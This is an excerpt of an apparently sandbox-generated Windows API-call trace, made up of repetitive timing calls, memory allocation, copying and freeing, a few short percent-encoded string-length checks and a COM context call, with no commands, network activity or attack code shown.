GetTickCount () returned 0x210d1af [0100.449] memcpy (in: _Dst=0x24adf9bb7c8, _Src=0x24ae13ae3d0, _Size=0x8 | out: _Dst=0x24adf9bb7c8) returned 0x24adf9bb7c8 [0100.449] free (_Block=0x24ae13ae3d0) [0100.450] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8c", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.450] GetTickCount () returned 0x210d1af [0100.450] GetTickCount () returned 0x210d1af [0100.450] memcpy (in: _Dst=0x24ae1a7d128, _Src=0x24ae1a7ef90, _Size=0x18 | out: _Dst=0x24ae1a7d128) returned 0x24ae1a7d128 [0100.450] GetTickCount () returned 0x210d1af [0100.451] GetTickCount () returned 0x210d1af [0100.451] memcpy (in: _Dst=0x24adf9bc1b8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9bc1b8) returned 0x24adf9bc1b8 [0100.451] malloc (_Size=0x28) returned 0x24ae13a4c60 [0100.451] GetTickCount () returned 0x210d1af [0100.451] memcpy (in: _Dst=0x24adf9bb85e, _Src=0x24ae1a0f69c, _Size=0xc | out: _Dst=0x24adf9bb85e) returned 0x24adf9bb85e [0100.451] memcpy (in: _Dst=0x24adf9bb858, _Src=0x24adf9bc1b8, _Size=0x6 | out: _Dst=0x24adf9bb858) returned 0x24adf9bb858 [0100.451] free (_Block=0x24ae13a4c60) [0100.452] GetTickCount () returned 0x210d1af [0100.452] GetTickCount () returned 0x210d1af [0100.452] GetTickCount () returned 0x210d1af [0100.452] GetTickCount () returned 0x210d1af [0100.452] GetTickCount () returned 0x210d1af [0100.452] GetTickCount () returned 0x210d1af [0100.453] GetTickCount () returned 0x210d1af [0100.453] GetTickCount () returned 0x210d1af [0100.454] GetTickCount () returned 0x210d1af [0100.454] malloc (_Size=0x28) returned 0x24ae13a4db0 [0100.454] GetTickCount () returned 0x210d1af [0100.454] GetTickCount () returned 0x210d1af [0100.454] GetTickCount () returned 0x210d1af [0100.454] malloc (_Size=0x28) returned 0x24ae13a4fc0 [0100.455] GetTickCount () returned 0x210d1af [0100.455] GetTickCount () returned 0x210d1af [0100.455] GetTickCount () returned 0x210d1af [0100.455] GetTickCount () returned 0x210d1af [0100.456] malloc (_Size=0x28) returned 0x24ae13a4ff0 [0100.456] GetTickCount () returned 0x210d1af [0100.464] GetTickCount () returned 0x210d1bf [0100.464] GetTickCount () returned 0x210d1bf [0100.464] malloc (_Size=0x28) returned 0x24ae13a5020 [0100.464] GetTickCount () returned 0x210d1bf [0100.465] GetTickCount () returned 0x210d1bf [0100.465] GetTickCount () returned 0x210d1bf [0100.465] malloc (_Size=0x28) returned 0x24ae13a4cc0 [0100.465] GetTickCount () returned 0x210d1bf [0100.465] memcpy (in: _Dst=0x24adf9bb9b2, _Src=0x24adf9bbcf8, _Size=0x2 | out: _Dst=0x24adf9bb9b2) returned 0x24adf9bb9b2 [0100.465] memcpy (in: _Dst=0x24adf9bb9b0, _Src=0x24adf9bc298, _Size=0x2 | out: _Dst=0x24adf9bb9b0) returned 0x24adf9bb9b0 [0100.465] memcpy (in: _Dst=0x24adf9bb9ae, _Src=0x24adf9bc198, _Size=0x2 | out: _Dst=0x24adf9bb9ae) returned 0x24adf9bb9ae [0100.466] memcpy (in: _Dst=0x24adf9bb9ac, _Src=0x24adf9bc3b8, _Size=0x2 | out: _Dst=0x24adf9bb9ac) returned 0x24adf9bb9ac [0100.466] memcpy (in: _Dst=0x24adf9bb9aa, _Src=0x24adf9bc178, _Size=0x2 | out: _Dst=0x24adf9bb9aa) returned 0x24adf9bb9aa [0100.466] memcpy (in: _Dst=0x24adf9bb9a8, _Src=0x24adf9bc358, _Size=0x2 | out: _Dst=0x24adf9bb9a8) returned 0x24adf9bb9a8 [0100.466] free (_Block=0x24ae13a4cc0) [0100.466] GetTickCount () returned 0x210d1bf [0100.466] GetTickCount () returned 0x210d1bf [0100.467] GetTickCount () returned 0x210d1bf [0100.467] GetTickCount () returned 0x210d1bf [0100.467] memcpy (in: _Dst=0x24adf9bc0f8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bc0f8) returned 0x24adf9bc0f8 [0100.467] malloc (_Size=0x28) returned 0x24ae13a4c60 [0100.467] GetTickCount () returned 0x210d1bf [0100.467] memcpy (in: _Dst=0x24adf9bb4cc, _Src=0x24adf9bc0f8, _Size=0x4 | out: _Dst=0x24adf9bb4cc) returned 0x24adf9bb4cc [0100.467] memcpy (in: _Dst=0x24adf9bb4c8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb4c8) returned 0x24adf9bb4c8 [0100.468] free (_Block=0x24ae13a4c60) [0100.468] GetTickCount () returned 0x210d1bf [0100.468] memcpy (in: _Dst=0x24adf9bc3d8, _Src=0x24adf9bb4cc, _Size=0x4 | out: _Dst=0x24adf9bc3d8) returned 0x24adf9bc3d8 [0100.468] malloc (_Size=0x28) returned 0x24ae13a4c60 [0100.468] GetTickCount () returned 0x210d1bf [0100.468] GetTickCount () returned 0x210d1bf [0100.468] GetTickCount () returned 0x210d1bf [0100.468] GetTickCount () returned 0x210d1bf [0100.468] GetTickCount () returned 0x210d1bf [0100.468] memcpy (in: _Dst=0x24adf9bc2f8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bc2f8) returned 0x24adf9bc2f8 [0100.468] malloc (_Size=0x28) returned 0x24ae13a4cc0 [0100.469] GetTickCount () returned 0x210d1bf [0100.469] memcpy (in: _Dst=0x24adf9bb8ec, _Src=0x24adf9bc2f8, _Size=0x4 | out: _Dst=0x24adf9bb8ec) returned 0x24adf9bb8ec [0100.469] memcpy (in: _Dst=0x24adf9bb8e8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb8e8) returned 0x24adf9bb8e8 [0100.469] free (_Block=0x24ae13a4cc0) [0100.469] GetTickCount () returned 0x210d1bf [0100.469] memcpy (in: _Dst=0x24adf9bbdf8, _Src=0x24adf9bb8ec, _Size=0x4 | out: _Dst=0x24adf9bbdf8) returned 0x24adf9bbdf8 [0100.469] malloc (_Size=0x28) returned 0x24ae13a4cc0 [0100.469] GetTickCount () returned 0x210d1bf [0100.469] malloc (_Size=0x28) returned 0x24ae13a4cf0 [0100.469] GetTickCount () returned 0x210d1bf [0100.470] GetTickCount () returned 0x210d1bf [0100.470] GetTickCount () returned 0x210d1bf [0100.470] GetTickCount () returned 0x210d1bf [0100.470] GetTickCount () returned 0x210d1bf [0100.470] GetTickCount () returned 0x210d1bf [0100.470] memcpy (in: _Dst=0x24adf9bbf78, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bbf78) returned 0x24adf9bbf78 [0100.470] malloc (_Size=0x28) returned 0x24ae13af050 [0100.470] GetTickCount () returned 0x210d1bf [0100.470] memcpy (in: _Dst=0x24adf9bbb5c, _Src=0x24adf9bbf78, _Size=0x4 | out: _Dst=0x24adf9bbb5c) returned 0x24adf9bbb5c [0100.470] memcpy (in: _Dst=0x24adf9bbb58, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bbb58) returned 0x24adf9bbb58 [0100.471] free (_Block=0x24ae13af050) [0100.471] GetTickCount () returned 0x210d1bf [0100.471] memcpy (in: _Dst=0x24adf9bbf98, _Src=0x24adf9bbb5c, _Size=0x4 | out: _Dst=0x24adf9bbf98) returned 0x24adf9bbf98 [0100.471] malloc (_Size=0x28) returned 0x24ae13af5c0 [0100.471] malloc (_Size=0x28) returned 0x24ae13af620 [0100.497] memcpy (in: _Dst=0x24adf9bc3f8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bc3f8) returned 0x24adf9bc3f8 [0100.497] malloc (_Size=0x28) returned 0x24ae13af110 [0100.498] memcpy (in: _Dst=0x24adf9bb88c, _Src=0x24adf9bc3f8, _Size=0x4 | out: _Dst=0x24adf9bb88c) returned 0x24adf9bb88c [0100.498] memcpy (in: _Dst=0x24adf9bb888, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb888) returned 0x24adf9bb888 [0100.499] free (_Block=0x24ae13af110) [0100.499] memcpy (in: _Dst=0x24adf9bc118, _Src=0x24adf9bb88c, _Size=0x4 | out: _Dst=0x24adf9bc118) returned 0x24adf9bc118 [0100.499] malloc (_Size=0x28) returned 0x24ae13af050 [0100.499] malloc (_Size=0x28) returned 0x24ae13af320 [0100.499] memcpy (in: _Dst=0x24adf9bbe18, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bbe18) returned 0x24adf9bbe18 [0100.499] malloc (_Size=0x28) returned 0x24ae13af140 [0100.499] memcpy (in: _Dst=0x24adf9bb8bc, _Src=0x24adf9bbe18, _Size=0x4 | out: _Dst=0x24adf9bb8bc) returned 0x24adf9bb8bc [0100.499] memcpy (in: _Dst=0x24adf9bb8b8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb8b8) returned 0x24adf9bb8b8 [0100.500] free (_Block=0x24ae13af140) [0100.501] memcpy (in: _Dst=0x24adf9bc098, _Src=0x24adf9bb8bc, _Size=0x4 | out: _Dst=0x24adf9bc098) returned 0x24adf9bc098 [0100.501] malloc (_Size=0x28) returned 0x24ae13af4d0 [0100.501] malloc (_Size=0x28) returned 0x24ae13af230 [0100.501] memcpy (in: _Dst=0x24adf9bbcd8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bbcd8) returned 0x24adf9bbcd8 [0100.501] malloc (_Size=0x28) returned 0x24ae13af530 [0100.501] memcpy (in: _Dst=0x24adf9bb97c, _Src=0x24adf9bbcd8, _Size=0x4 | out: _Dst=0x24adf9bb97c) returned 0x24adf9bb97c [0100.501] memcpy (in: _Dst=0x24adf9bb978, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb978) returned 0x24adf9bb978 [0100.503] free (_Block=0x24ae13af530) [0100.503] memcpy (in: _Dst=0x24adf9bbdd8, _Src=0x24adf9bb97c, _Size=0x4 | out: _Dst=0x24adf9bbdd8) returned 0x24adf9bbdd8 [0100.504] malloc (_Size=0x28) returned 0x24ae13af590 [0100.504] malloc (_Size=0x28) returned 0x24ae13af1a0 [0100.504] memcpy (in: _Dst=0x24adf9a5f08, _Src=0x24adf9bbdd8, _Size=0x4 | out: _Dst=0x24adf9a5f08) returned 0x24adf9a5f08 [0100.504] memcpy (in: _Dst=0x24adf9a5f06, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5f06) returned 0x24adf9a5f06 [0100.504] memcpy (in: _Dst=0x24adf9a5f02, _Src=0x24adf9bc098, _Size=0x4 | out: _Dst=0x24adf9a5f02) returned 0x24adf9a5f02 [0100.504] memcpy (in: _Dst=0x24adf9a5f00, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5f00) returned 0x24adf9a5f00 [0100.504] memcpy (in: _Dst=0x24adf9a5efc, _Src=0x24adf9bc118, _Size=0x4 | out: _Dst=0x24adf9a5efc) returned 0x24adf9a5efc [0100.504] memcpy (in: _Dst=0x24adf9a5efa, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5efa) returned 0x24adf9a5efa [0100.504] memcpy (in: _Dst=0x24adf9a5ef6, _Src=0x24adf9bbf98, _Size=0x4 | out: _Dst=0x24adf9a5ef6) returned 0x24adf9a5ef6 [0100.504] memcpy (in: _Dst=0x24adf9a5ef4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5ef4) returned 0x24adf9a5ef4 [0100.504] memcpy (in: _Dst=0x24adf9a5ef0, _Src=0x24adf9bbdf8, _Size=0x4 | out: _Dst=0x24adf9a5ef0) returned 0x24adf9a5ef0 [0100.504] memcpy (in: _Dst=0x24adf9a5eee, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5eee) returned 0x24adf9a5eee [0100.504] memcpy (in: _Dst=0x24adf9a5eea, _Src=0x24adf9bc3d8, _Size=0x4 | out: _Dst=0x24adf9a5eea) returned 0x24adf9a5eea [0100.504] memcpy (in: _Dst=0x24adf9a5ee8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5ee8) returned 0x24adf9a5ee8 [0100.505] free (_Block=0x24ae13af1a0) [0100.505] SysStringLen (param_1="%1f%c3%bf%33%c3%9a") returned 0x12 [0100.505] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13ae3d0 [0100.506] memcpy (in: _Dst=0x24adf9bb918, _Src=0x24ae13ae3d0, _Size=0x8 | out: _Dst=0x24adf9bb918) returned 0x24adf9bb918 [0100.506] free (_Block=0x24ae13ae3d0) [0100.507] memcpy (in: _Dst=0x24adf9bc0b8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9bc0b8) returned 0x24adf9bc0b8 [0100.507] malloc (_Size=0x28) returned 0x24ae13af0e0 [0100.507] memcpy (in: _Dst=0x24adf9bb5be, _Src=0x24ae1a0f69c, _Size=0xc | out: _Dst=0x24adf9bb5be) returned 0x24adf9bb5be [0100.507] memcpy (in: _Dst=0x24adf9bb5b8, _Src=0x24adf9bc0b8, _Size=0x6 | out: _Dst=0x24adf9bb5b8) returned 0x24adf9bb5b8 [0100.507] free (_Block=0x24ae13af0e0) [0100.508] malloc (_Size=0x70) returned 0x24ae146f920 [0100.508] malloc (_Size=0x970) returned 0x24ae13abaa0 [0100.508] malloc (_Size=0x28) returned 0x24ae13af0b0 [0100.509] malloc (_Size=0x28) returned 0x24ae13aef90 [0100.509] malloc (_Size=0x28) returned 0x24ae13af0e0 [0100.509] memcpy (in: _Dst=0x24adf9bb94e, _Src=0x24adf9bc1f8, _Size=0x2 | out: _Dst=0x24adf9bb94e) returned 0x24adf9bb94e [0100.509] memcpy (in: _Dst=0x24adf9bb94c, _Src=0x24adf9bbdb8, _Size=0x2 | out: _Dst=0x24adf9bb94c) returned 0x24adf9bb94c [0100.509] memcpy (in: _Dst=0x24adf9bb94a, _Src=0x24adf9bbd18, _Size=0x2 | out: _Dst=0x24adf9bb94a) returned 0x24adf9bb94a [0100.509] memcpy (in: _Dst=0x24adf9bb948, _Src=0x24adf9bc278, _Size=0x2 | out: _Dst=0x24adf9bb948) returned 0x24adf9bb948 [0100.510] free (_Block=0x24ae13af0e0) [0100.510] GetTickCount () returned 0x210d1ee [0100.510] GetTickCount () returned 0x210d1ee [0100.510] memcpy (in: _Dst=0x24adf9bbeb8, _Src=0xd6788f9a50, _Size=0x2 | out: _Dst=0x24adf9bbeb8) returned 0x24adf9bbeb8 [0100.510] malloc (_Size=0x28) returned 0x24ae13af020 [0100.511] memcpy (in: _Dst=0x24adf9bbefc, _Src=0x24adf9bbeb8, _Size=0x2 | out: _Dst=0x24adf9bbefc) returned 0x24adf9bbefc [0100.511] memcpy (in: _Dst=0x24adf9bbef8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bbef8) returned 0x24adf9bbef8 [0100.511] free (_Block=0x24ae13af020) [0100.511] memcpy (in: _Dst=0x24adf9bbf38, _Src=0x24adf9bbefa, _Size=0x4 | out: _Dst=0x24adf9bbf38) returned 0x24adf9bbf38 [0100.511] malloc (_Size=0x28) returned 0x24ae13af350 [0100.512] memcpy (in: _Dst=0x24adf9bbf58, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bbf58) returned 0x24adf9bbf58 [0100.512] malloc (_Size=0x28) returned 0x24ae13af170 [0100.512] memcpy (in: _Dst=0x24adf9bb9dc, _Src=0x24adf9bbf58, _Size=0x4 | out: _Dst=0x24adf9bb9dc) returned 0x24adf9bb9dc [0100.512] memcpy (in: _Dst=0x24adf9bb9d8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb9d8) returned 0x24adf9bb9d8 [0100.513] free (_Block=0x24ae13af170) [0100.513] memcpy (in: _Dst=0x24adf9bbfb8, _Src=0x24adf9bb9dc, _Size=0x4 | out: _Dst=0x24adf9bbfb8) returned 0x24adf9bbfb8 [0100.513] malloc (_Size=0x28) returned 0x24ae13af380 [0100.513] malloc (_Size=0x28) returned 0x24ae13af1a0 [0100.513] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0100.514] free (_Block=0x24ae13aef90) [0100.515] free (_Block=0x24ae13af0b0) [0100.516] free (_Block=0x24ae13af590) [0100.517] free (_Block=0x24ae13af230) [0100.517] free (_Block=0x24ae13af4d0) [0100.518] free (_Block=0x24ae13af320) [0100.518] free (_Block=0x24ae13af050) [0100.530] free (_Block=0x24ae13af620) [0100.531] free (_Block=0x24ae13af5c0) [0100.531] free (_Block=0x24ae13a4cf0) [0100.531] free (_Block=0x24ae13a4cc0) [0100.532] free (_Block=0x24ae13a4c60) [0100.533] free (_Block=0x24ae13a5020) [0100.533] free (_Block=0x24ae13a4ff0) [0100.534] free (_Block=0x24ae13a4fc0) [0100.534] free (_Block=0x24ae13a4db0) [0100.535] free (_Block=0x24ae13a4c30) [0100.536] free (_Block=0x24ae13a4c00) [0100.536] free (_Block=0x24ae13a4bd0) [0100.537] free (_Block=0x24ae13a4b40) [0100.537] free (_Block=0x24ae13a4f90) [0100.538] free (_Block=0x24ae13a4b10) [0100.538] free (_Block=0x24ae13a4990) [0100.538] free (_Block=0x24ae13a50b0) [0100.539] free (_Block=0x24ae13a4ab0) [0100.539] free (_Block=0x24ae13a4f60) [0100.540] free (_Block=0x24ae13a4f30) [0100.540] free (_Block=0x24ae13a4d50) [0100.540] free (_Block=0x24ae13a4ed0) [0100.541] free (_Block=0x24ae13a5050) [0100.542] free (_Block=0x24ae13a4ea0) [0100.542] free (_Block=0x24ae13a4ba0) [0100.543] free (_Block=0x24ae13a4d80) [0100.544] free (_Block=0x24ae13a4a20) [0100.545] free (_Block=0x24ae13a49f0) [0100.546] free (_Block=0x24ae13a4960) [0100.547] free (_Block=0x24ae13a4a80) [0100.547] free (_Block=0x24ae13a49c0) [0100.548] free (_Block=0x24ae13a4e10) [0100.548] free (_Block=0x24ae13a4d20) [0100.549] free (_Block=0x24ae13a4ae0) [0100.550] free (_Block=0x24ae13a4e70) [0100.551] free (_Block=0x24ae13a4c90) [0100.551] free (_Block=0x24ae13b0d00) [0100.552] free (_Block=0x24ae139d920) [0100.552] free (_Block=0x24ae13b2110) [0100.553] free (_Block=0x24ae13af8f0) [0100.553] free (_Block=0x24ae13ae4d0) [0100.553] free (_Block=0x24ae13adab0) [0100.554] free (_Block=0x24ae1396be0) [0100.554] free (_Block=0x24ae13ad530) [0100.554] free (_Block=0x24ae146fa20) [0100.555] free (_Block=0x24ae13a50e0) [0100.555] free (_Block=0x24ae13a4de0) [0100.555] free (_Block=0x24ae13a4f00) [0100.556] free (_Block=0x24ae13a4e40) [0100.556] free (_Block=0x24ae13a5080) [0100.557] free (_Block=0x24ae13a4a50) [0100.557] free (_Block=0x24ae13a4b70) [0100.558] free (_Block=0x24ae13949a0) [0100.558] free (_Block=0x24ae13948b0) [0100.559] free (_Block=0x24ae1394880) [0100.560] free (_Block=0x24ae13947f0) [0100.561] free (_Block=0x24ae1394df0) [0100.562] free (_Block=0x24ae1394910) [0100.562] free (_Block=0x24ae1394d90) [0100.563] free (_Block=0x24ae1394d60) [0100.563] free (_Block=0x24ae1394af0) [0100.564] free (_Block=0x24ae1394c70) [0100.565] free (_Block=0x24ae1394a00) [0100.567] free (_Block=0x24ae1394ac0) [0100.569] free (_Block=0x24ae146f9a0) [0100.569] free (_Block=0x24ae1394cd0) [0100.569] free (_Block=0x24ae1394a90) [0100.570] free (_Block=0x24ae13948e0) [0100.570] free (_Block=0x24ae13949d0) [0100.571] free (_Block=0x24ae1394c40) [0100.571] free (_Block=0x24ae1394760) [0100.571] free (_Block=0x24ae1394dc0) [0100.572] free (_Block=0x24ae1394730) [0100.572] free (_Block=0x24ae13946d0) [0100.572] free (_Block=0x24ae1394bb0) [0100.573] free (_Block=0x24ae1394d30) [0100.573] free (_Block=0x24ae1394d00) [0100.574] free (_Block=0x24ae1394a60) [0100.574] free (_Block=0x24ae1394ca0) [0100.575] free (_Block=0x24ae13946a0) [0100.575] free (_Block=0x24ae1394970) [0100.576] free (_Block=0x24ae1394b80) [0100.576] free (_Block=0x24ae1394a30) [0100.576] free (_Block=0x24ae1394be0) [0100.577] free (_Block=0x24ae1394b20) [0100.577] free (_Block=0x24ae1394c10) [0100.578] free (_Block=0x24ae1394820) [0100.578] free (_Block=0x24ae1394670) [0100.578] free (_Block=0x24ae13947c0) [0100.579] free (_Block=0x24ae13a0370) [0100.579] free (_Block=0x24ae1395fb0) [0100.579] free (_Block=0x24ae13a1780) [0100.580] free (_Block=0x24ae139ef60) [0100.580] free (_Block=0x24ae139db40) [0100.581] free (_Block=0x24ae1396e70) [0100.581] free (_Block=0x24ae148ed20) [0100.581] free (_Block=0x24ae1395cc0) [0100.582] free (_Block=0x24ae146f8a0) [0100.582] free (_Block=0x24ae1394850) [0100.582] free (_Block=0x24ae1394790) [0100.582] free (_Block=0x24ae1394940) [0100.582] free (_Block=0x24ae1394b50) [0100.582] free (_Block=0x24ae1394700) [0100.582] free (_Block=0x24ae148afb0) [0100.582] free (_Block=0x24ae148ae30) [0100.582] free (_Block=0x24ae148ab90) [0100.583] free (_Block=0x24ae148ae60) [0100.583] free (_Block=0x24ae148b310) [0100.583] free (_Block=0x24ae148b2e0) [0100.584] free (_Block=0x24ae148af80) [0100.584] free (_Block=0x24ae148ae00) [0100.584] free (_Block=0x24ae148b280) [0100.585] free (_Block=0x24ae148add0) [0100.585] free (_Block=0x24ae148aef0) [0100.585] free (_Block=0x24ae1398a00) [0100.585] free (_Block=0x24ae1483ab0) [0100.585] free (_Block=0x24ae1399e10) [0100.585] free (_Block=0x24ae13975f0) [0100.585] free (_Block=0x24ae13961d0) [0100.585] free (_Block=0x24ae13957b0) [0100.587] free (_Block=0x24ae148bf60) [0100.587] free (_Block=0x24ae148ea30) [0100.588] free (_Block=0x24ae14702a0) [0100.588] free (_Block=0x24ae148b220) [0100.589] free (_Block=0x24ae148ada0) [0100.589] free (_Block=0x24ae148b160) [0100.589] free (_Block=0x24ae148ad10) [0100.590] free (_Block=0x24ae148ad40) [0100.590] free (_Block=0x24ae148b1f0) [0100.590] free (_Block=0x24ae148ace0) [0100.591] free (_Block=0x24ae148b130) [0100.591] free (_Block=0x24ae148b190) [0100.592] free (_Block=0x24ae148b2b0) [0100.592] free (_Block=0x24ae148acb0) [0100.593] free (_Block=0x24ae148abf0) [0100.593] free (_Block=0x24ae148ae90) [0100.593] free (_Block=0x24ae148ac50) [0100.594] free (_Block=0x24ae148d620) [0100.594] free (_Block=0x24ae14844d0) [0100.594] free (_Block=0x24ae1391490) [0100.595] free (_Block=0x24ae1390080) [0100.595] free (_Block=0x24ae148cc10) [0100.596] free (_Block=0x24ae148c1f0) [0100.596] free (_Block=0x24ae148bcd0) [0100.597] free (_Block=0x24ae14841e0) [0100.598] free (_Block=0x24ae1470320) [0100.598] free (_Block=0x24ae148b0a0) [0100.599] free (_Block=0x24ae148ad70) [0100.599] free (_Block=0x24ae148af50) [0100.600] free (_Block=0x24ae148abc0) [0100.600] free (_Block=0x24ae148b250) [0100.600] free (_Block=0x24ae148b1c0) [0100.601] free (_Block=0x24ae148aec0) [0100.601] free (_Block=0x24ae148afe0) [0100.602] free (_Block=0x24ae148ac80) [0100.602] free (_Block=0x24ae148b070) [0100.602] free (_Block=0x24ae148ac20) [0100.603] free (_Block=0x24ae148b040) [0100.603] free (_Block=0x24ae148af20) [0100.603] free (_Block=0x24ae148b0d0) [0100.604] free (_Block=0x24ae148b010) [0100.604] free (_Block=0x24ae148b100) [0100.605] free (_Block=0x24ae1480b00) [0100.605] free (_Block=0x24ae14807d0) [0100.606] free (_Block=0x24ae1480aa0) [0100.606] free (_Block=0x24ae1480a70) [0100.607] free (_Block=0x24ae1480a10) [0100.607] free (_Block=0x24ae1480a40) [0100.607] free (_Block=0x24ae14809b0) [0100.608] free (_Block=0x24ae1480890) [0100.608] free (_Block=0x24ae1480830) [0100.608] free (_Block=0x24ae1480950) [0100.609] free (_Block=0x24ae14809e0) [0100.609] free (_Block=0x24ae14808c0) [0100.609] free (_Block=0x24ae1480980) [0100.610] free (_Block=0x24ae1486f20) [0100.610] free (_Block=0x24ae14838a0) [0100.611] free (_Block=0x24ae1488330) [0100.611] free (_Block=0x24ae1485b10) [0100.611] free (_Block=0x24ae14846f0) [0100.612] free (_Block=0x24ae1483cd0) [0100.612] free (_Block=0x24ae1483610) [0100.613] free (_Block=0x24ae1483320) [0100.613] free (_Block=0x24ae146f820) [0100.614] free (_Block=0x24ae1470620) [0100.614] free (_Block=0x24ae14700a0) [0100.615] free (_Block=0x24ae1480800) [0100.615] free (_Block=0x24ae1480b30) [0100.616] free (_Block=0x24ae1480860) [0100.616] free (_Block=0x24ae14808f0) [0100.616] free (_Block=0x24ae1480ad0) [0100.617] free (_Block=0x24ae1480920) [0100.617] free (_Block=0x24ae1480750) [0100.618] free (_Block=0x24ae1480720) [0100.618] free (_Block=0x24ae14806f0) [0100.618] free (_Block=0x24ae14806c0) [0100.619] free (_Block=0x24ae1480690) [0100.619] free (_Block=0x24ae1480660) [0100.619] free (_Block=0x24ae1480630) [0100.620] free (_Block=0x24ae14803f0) [0100.620] free (_Block=0x24ae147eea0) [0100.621] free (_Block=0x24ae146c320) [0100.621] free (_Block=0x24ae146fd20) [0100.622] free (_Block=0x24adfc6ef50) [0100.622] MulDiv (nNumber=966, nNumerator=100, nDenominator=1932) returned 50 [0100.622] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0100.622] GetTickCount () returned 0x210d25b [0100.622] GetTickCount () returned 0x210d25b [0100.622] malloc (_Size=0x28) returned 0x24ae13af5c0 [0100.622] free (_Block=0x24ae13af5c0) [0100.623] memcpy (in: _Dst=0x24adf9bb888, _Src=0x24adf9bb8bc, _Size=0x4 | out: _Dst=0x24adf9bb888) returned 0x24adf9bb888 [0100.623] malloc (_Size=0x28) returned 0x24ae13af3b0 [0100.623] malloc (_Size=0x28) returned 0x24ae13af050 [0100.623] malloc (_Size=0x28) returned 0x24ae13aef90 [0100.623] free (_Block=0x24ae13aef90) [0100.623] memcpy (in: _Dst=0x24adf9bb4c8, _Src=0x24adf9bb8ec, _Size=0x4 | out: _Dst=0x24adf9bb4c8) returned 0x24adf9bb4c8 [0100.623] malloc (_Size=0x28) returned 0x24ae13af020 [0100.623] malloc (_Size=0x28) returned 0x24ae13af230 [0100.624] free (_Block=0x24ae13af230) [0100.624] SysStringLen (param_1="%0e%6c%22%30") returned 0xc [0100.624] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.624] memcpy (in: _Dst=0x24adf9bb6d8, _Src=0x24ae1480630, _Size=0x8 | out: _Dst=0x24adf9bb6d8) returned 0x24adf9bb6d8 [0100.624] free (_Block=0x24ae1480630) [0100.625] malloc (_Size=0x2e0) returned 0x24ae13a4910 [0100.625] GetTickCount () returned 0x210d25b [0100.625] malloc (_Size=0x20) returned 0x24ae13af440 [0100.625] malloc (_Size=0x288) returned 0x24ae13a4c00 [0100.625] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139ce50 [0100.625] realloc (_Block=0x24ae13af440, _Size=0x40) returned 0x24ae146c320 [0100.625] GetTickCount () returned 0x210d25b [0100.625] realloc (_Block=0x24ae139ce50, _Size=0x280) returned 0x24ae148d310 [0100.625] malloc (_Size=0x508) returned 0x24ae1394620 [0100.625] GetTickCount () returned 0x210d25b [0100.625] realloc (_Block=0x24ae146c320, _Size=0x80) returned 0x24ae1480630 [0100.625] GetTickCount () returned 0x210d25b [0100.625] realloc (_Block=0x24ae148d310, _Size=0x500) returned 0x24ae1485ad0 [0100.625] GetTickCount () returned 0x210d25b [0100.625] malloc (_Size=0xa08) returned 0x24ae148bcd0 [0100.625] GetTickCount () returned 0x210d25b [0100.626] realloc (_Block=0x24ae1480630, _Size=0x100) returned 0x24ae1480630 [0100.626] GetTickCount () returned 0x210d25b [0100.626] realloc (_Block=0x24ae1485ad0, _Size=0xa00) returned 0x24ae13b1f80 [0100.627] GetTickCount () returned 0x210d25b [0100.627] GetTickCount () returned 0x210d25b [0100.627] GetTickCount () returned 0x210d25b [0100.627] GetTickCount () returned 0x210d25b [0100.627] malloc (_Size=0x1408) returned 0x24ae1483320 [0100.627] GetTickCount () returned 0x210d25b [0100.627] realloc (_Block=0x24ae1480630, _Size=0x200) returned 0x24ae13a4e90 [0100.627] GetTickCount () returned 0x210d25b [0100.627] GetTickCount () returned 0x210d25b [0100.627] GetTickCount () returned 0x210d25b [0100.627] realloc (_Block=0x24ae13b1f80, _Size=0x1400) returned 0x24ae1390080 [0100.627] GetTickCount () returned 0x210d25b [0100.627] GetTickCount () returned 0x210d25b [0100.636] GetTickCount () returned 0x210d26b [0100.636] GetTickCount () returned 0x210d26b [0100.636] GetTickCount () returned 0x210d26b [0100.636] GetTickCount () returned 0x210d26b [0100.636] GetTickCount () returned 0x210d26b [0100.636] GetTickCount () returned 0x210d26b [0100.636] malloc (_Size=0x2808) returned 0x24ae1391490 [0100.636] GetTickCount () returned 0x210d26b [0100.637] GetTickCount () returned 0x210d26b [0100.639] GetTickCount () returned 0x210d26b [0100.641] GetTickCount () returned 0x210d26b [0100.643] GetTickCount () returned 0x210d26b [0100.646] GetTickCount () returned 0x210d27a [0100.648] GetTickCount () returned 0x210d27a 